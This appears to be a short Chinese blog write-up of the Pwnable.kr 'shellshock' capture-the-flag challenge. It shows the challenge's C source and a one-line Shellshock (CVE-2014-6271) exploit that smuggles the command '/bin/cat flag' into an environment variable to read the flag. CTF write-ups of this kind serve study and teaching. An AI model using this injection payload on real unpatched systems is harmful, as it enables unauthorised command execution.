Chybeta

Pwnable.kr:shellshock

bash破壳漏洞应用。

题目

1
2
3
4
5
6
7
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}

exp

有名的bash破壳漏洞。所以这里不展开了。直接给出exp:

1
2
3
shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:Pwnable.kr:shellshock

文章作者:chybeta

发布时间:2017年08月01日 - 21:08

最后更新:2017年08月01日 - 21:08

原始链接:http://chybeta.github.io/2017/08/01/Pwnable-kr-shellshock/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。